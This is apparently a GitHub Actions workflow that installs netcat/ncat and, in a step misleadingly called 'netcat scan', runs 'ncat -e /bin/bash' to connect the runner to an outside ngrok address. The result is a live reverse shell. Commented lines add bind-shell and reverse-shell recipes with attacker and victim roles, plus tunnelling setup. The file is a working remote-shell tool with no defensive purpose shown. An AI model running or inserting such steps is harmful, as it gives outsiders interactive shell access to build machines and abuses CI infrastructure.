name: netcat

on: workflow_dispatch

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
#---------------------------------------------------update 
    - name: update
      run: sudo apt update
#---------------------------------------------------netcat
    - name: netcat install 
      run:  sudo apt install netcat && sudo apt install ncat
    - name: netcat scan
      run: |
       #nc -e /bin/bash  5.tcp.eu.ngrok.io 19700
       ncat -e /bin/bash  5.tcp.eu.ngrok.io 19700
       

       
#--------------------------------bind shell       
#nc -l -p 1212 -e /bin/bash
#nc 5.tcp.eu.ngrok.io 19700
#--------------------------------reverce shell 44444
#attacker=>ngrok tcp 1212 + nc -l -p 1212
#victim =>nc -e /bin/bash  5.tcp.eu.ngrok.io 19700 
#--------------------------------
       
#npm install -g localtunnel
#lt --port 8000
#nc -l -p 1299 =>start lisiner
#nc localhost 1299 =>connect to lisinner
